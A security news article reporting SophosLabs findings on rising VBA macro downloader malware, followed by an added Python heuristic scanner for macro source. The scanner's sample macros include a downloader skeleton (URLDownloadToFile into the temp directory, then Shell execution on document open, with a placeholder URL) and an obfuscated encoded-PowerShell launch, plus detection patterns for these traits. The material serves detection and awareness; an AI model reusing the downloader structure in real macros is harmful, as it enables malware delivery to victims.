VBA malware on the rise, a threat wrongly underestimated

Security experts at Sophos have detected a surge in cyber attacks based on VBA malware; such threats are still very insidious but often underestimated.

Experts at SophosLabs observed a surge in VBA malware: according to their analysis, macro-based malware accounted for 28 percent of all malware attacks detected in July, up from just six percent in June, even though 58 percent of the attacks still used known exploits.

The experts discovered several VBA downloader templates, which contain VBA code together with instructions for VBA malware authors on how to package and obfuscate their malicious code.

VBA malware is widely used by threat actors because its code can be changed rapidly to implement new evasion techniques; exploits, by contrast, have a rigid file structure that makes it difficult to apply any change for the same purpose without affecting functionality.

“Visual Basic code is easy to write, flexible and easy to refactor. Similar functionality can often be expressed in many different ways which gives malware authors more options for producing distinct, workable versions of their software than they have with exploits,” wrote Graham Chantry, a senior security researcher at SophosLabs, in a blog post.

Another advantage of Visual Basic malware is that, unlike exploits, it is not “tied to specific versions of Microsoft Office”: it is enough that the victim runs a vulnerable version of Office and lacks effective anti-virus software for the malicious code to infect the machine.

VBA malware has a big drawback compared with exploits: it can be easily neutralized by properly configuring Microsoft’s “Macro Security Level”. Newer Office versions (2007 or later) disable VBA macros from untrusted sources by default and execute the code only “if the user explicitly enables them.”

This means that the attacker needs a further effort to convince the victim to authorize the execution of the code. Typically this is done through social engineering, for example by telling the user that the code serves a purpose in their interest and requires disabling defensive features.

“To overcome this limitation, authors of malicious VBA code have to use Social Engineering techniques to trick users into running their macros,” states the post.

Visual Basic document-based malware is usually spread through spam campaigns in which the attached document hides the malicious code.

The blog post includes a template for a VBA malware downloader in which the DIRECT LINK HERE string must be replaced with a URI pointing to the malicious code.

The template “imports the Windows API URLDownloadToFile to download an executable into the user’s temporary directory,” and “once downloaded, the code uses the shell command to execute the dropped sample as a separate process,” states the post.

The availability of these templates makes it easier for VBA malware authors to write malicious code; the structure shown in the Sophos example is widely adopted for VBA downloaders, accounting for about 34 percent of all macro downloaders detected by Sophos in July.

Fortunately, the recently detected variants built on these templates are very similar to one another and can be easily caught by heuristic detection.

The threat posed by VBA malware should not be underestimated: as explained in the post, the experts detected numerous variants implementing creative techniques to infect victims’ machines.

Chantry wrote that “we saw Visual Basic code executing an encoded PowerShell script, to inject assembler code into memory,” and that “More recent variants have even utilised the AutoIt scripting language and traditional Batchscript.” By adding new layers to the infection process malware authors are likely trying to “conceal their true intentions from AV detection (wrapping malicious assembler code within PowerShell, within Visual Basic, etc.),” Chantry explained. “Obfuscating the malicious payload may be somewhat effective against static signature based detection but the obfuscation process itself serves as an excellent trait for heuristic detection. The only question now is what languages will they choose next?”
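The downloader template described earlier (URLDownloadToFile, the temporary directory, a Shell call) and the closing observation that obfuscation itself is a heuristic trait come down to the same detection idea: score macro source on the traits it exhibits rather than on a fixed signature. The Python script below is an added example written for this article, not code from Sophos or the template in the post. The trait list, weights, the 4-point threshold and the three sample macros are constructed for illustration; the URL in the downloader sample is a placeholder and the "encoded" PowerShell argument is a dummy string.

```python
"""Heuristic scoring of VBA macro source for downloader-template and
obfuscation traits (added example; not code from Sophos or the post)."""
import re
from dataclasses import dataclass, field

# Trait name -> (regex, weight, description). The traits follow the behaviour
# the post describes; the weights and the 4-point threshold are constructed.
TRAITS = {
    "api_urldownloadtofile": (r"URLDownloadToFile", 3,
                              "imports URLDownloadToFile from urlmon"),
    "shell_exec": (r"\bShell\s*\(", 2,
                   "runs a dropped file as a separate process via Shell"),
    "temp_dir": (r'Environ\s*\(\s*"TEMP"\s*\)', 1,
                 "targets the user's temporary directory"),
    "auto_open": (r"\b(AutoOpen|Auto_Open|Document_Open|Workbook_Open)\b", 1,
                  "runs automatically when the document is opened"),
    "powershell_encoded": (r"powershell[^\n]*-(enc|encodedcommand)", 3,
                           "launches an encoded PowerShell script"),
    "script_drop": (r"\.(bat|cmd|au3)\b", 1,
                    "references a batch or AutoIt script"),
    "chr_concat": (r"(Chr\s*\(\s*\d+\s*\)\s*&\s*){3,}", 2,
                   "assembles strings from Chr() chains (obfuscation)"),
    "strreverse": (r"\bStrReverse\s*\(", 1,
                   "reverses string literals at runtime (obfuscation)"),
}
TEMPLATE_TRAITS = ("api_urldownloadtofile", "shell_exec", "temp_dir")


def _chr_to_literal(m):
    code = int(m.group(1))
    ch = chr(code) if 32 <= code < 127 else ""
    # Leave the call untouched if it would not form a safe printable literal.
    return m.group(0) if ch in ("", '"') else '"' + ch + '"'


def unfold_strings(source: str) -> str:
    """Undo the simplest string obfuscations so traits hidden behind Chr()
    chains and StrReverse() become visible to the scanner."""
    out = re.sub(r"Chr\s*\(\s*(\d+)\s*\)", _chr_to_literal, source, flags=re.I)
    out = re.sub(r'StrReverse\s*\(\s*"([^"]*)"\s*\)',
                 lambda m: '"' + m.group(1)[::-1] + '"', out, flags=re.I)
    return re.sub(r'"\s*&\s*"', "", out)   # "a" & "b"  ->  "ab"


@dataclass
class Verdict:
    score: int = 0
    hits: dict = field(default_factory=dict)   # trait name -> description

    @property
    def matches_downloader_template(self) -> bool:
        # All three traits of the downloader structure the post describes.
        return all(t in self.hits for t in TEMPLATE_TRAITS)

    def suspicious(self, threshold: int = 4) -> bool:
        return self.score >= threshold


def scan_vba(source: str) -> Verdict:
    """Score macro source on both its raw text and its unfolded form, so the
    obfuscation is counted AND whatever it was hiding is counted too."""
    unfolded = unfold_strings(source)
    verdict = Verdict()
    for name, (pattern, weight, desc) in TRAITS.items():
        if re.search(pattern, source, re.I) or re.search(pattern, unfolded, re.I):
            verdict.hits[name] = desc
            verdict.score += weight
    return verdict


# --- Constructed sample macros (not real samples) ---------------------------
BENIGN_MACRO = r"""
Sub FormatReport()
    ' Constructed benign macro: formats the active sheet
    ActiveSheet.Range("A1:D1").Font.Bold = True
    ActiveSheet.Columns("A:D").AutoFit
End Sub
"""

# Mirrors the structure the post describes; the URL is a placeholder.
TEMPLATE_MACRO = r"""
Private Declare Function URLDownloadToFileA Lib "urlmon" _
    (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, _
     ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Sub AutoOpen()
    Dim target As String
    target = Environ("TEMP") & "\update.exe"
    URLDownloadToFileA 0, "http://DIRECT-LINK-HERE.invalid/file", target, 0, 0
    Call Shell(target, vbHide)
End Sub
"""

# The word "powershell" never appears literally; it is built from Chr() and
# StrReverse(), and the -EncodedCommand argument is a dummy string.
OBFUSCATED_MACRO = r"""
Sub Document_Open()
    Dim c As String
    c = Chr(112) & Chr(111) & Chr(119) & Chr(101) & Chr(114) & StrReverse("llehs") & " -NoP -EncodedCommand AAAA"
    Call Shell(c, 0)
End Sub
"""

if __name__ == "__main__":
    for label, src in [("benign", BENIGN_MACRO), ("template", TEMPLATE_MACRO),
                       ("obfuscated", OBFUSCATED_MACRO)]:
        v = scan_vba(src)
        print(f"{label}: score={v.score} suspicious={v.suspicious()} "
              f"template={v.matches_downloader_template} traits={sorted(v.hits)}")
```

Run as a script it scores each sample; the obfuscated macro scores highest because both the Chr()/StrReverse() obfuscation and the PowerShell launch it conceals are counted, which is exactly the point Chantry makes about obfuscation being a trait rather than a disguise. In practice the regexes would run over macro source extracted from the document (for example with an OLE/VBA parser) rather than over inline strings.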

Pierluigi Paganini

(Security Affairs – Sophos, VBA Malware)

Pierluigi Paganini is a member of the ENISA (European Union Agency for Network and Information Security) Threat Landscape Stakeholder Group and Cyber G7 Group; he is also a Security Evangelist, Security Analyst and Freelance Writer. Editor-in-Chief at "Cyber Defense Magazine", Pierluigi is a cyber security expert with over 20 years' experience in the field and a Certified Ethical Hacker at EC Council in London. The passion for writing and a strong belief that security is founded on sharing and awareness led Pierluigi to found the security blog "Security Affairs", recently named a Top National Security Resource for the US. Pierluigi is a member of the "The Hacker News" team and writes for some major publications in the field such as Cyber War Zone, ICTTF, Infosec Island, Infosec Institute, The Hacker News Magazine and many other security magazines. He is the author of the books "The Deep Dark Web" and “Digital Virtual Currency and Bitcoin”.
